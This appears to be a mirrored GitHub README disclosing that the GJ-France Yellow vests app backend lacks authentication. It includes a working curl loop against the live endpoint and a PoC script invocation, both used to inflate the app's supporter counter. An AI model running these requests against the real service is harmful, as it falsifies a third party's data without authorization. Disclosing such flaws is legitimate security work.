Coder Social home page Coder Social logo

gj-france-fail's Introduction

GJ-FRANCE API vulnerability

The GJ-France app is the "official" Android app of the Yellow vests movement in France.

As per their Google Play description, this app is presenting "the figures"

Présentation des chiffres A partir du menu "Les Chiffres", l'App présente deux types de chiffres : Le nombre de SOUTIENS du mouvement (actualisé en temps réél) Le nombre de GJ actifs terrain pour chaque jour

In the app, they called this section "The TRUE figures" aka media are lying we are more than that.

This Cordova app made by an "agency" called Whelp has many issues. Their backend is probably one of the worst backend I saw in my life. There is no authentication mechanism, they used POST requests for everything,...

Thanks to this lack of authentication mechanism, you can increment indefinitively the live support counter with the following command:

for i in {1..10}; do curl -X POST https://api.gj-france.fr/soutien; done

Oops, the TRUE figures are not really true anymore...

Demo

Demo

Affected Versions

1.0.8 and below

How To

# Add 200 new supporter
python poc.py 200

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

Following a tip from @thibeault_chenu, the investigation and the POC has been made with ❤️ by @fs0c131y

gj-france-fail's People

Contributors

fs0c131y avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.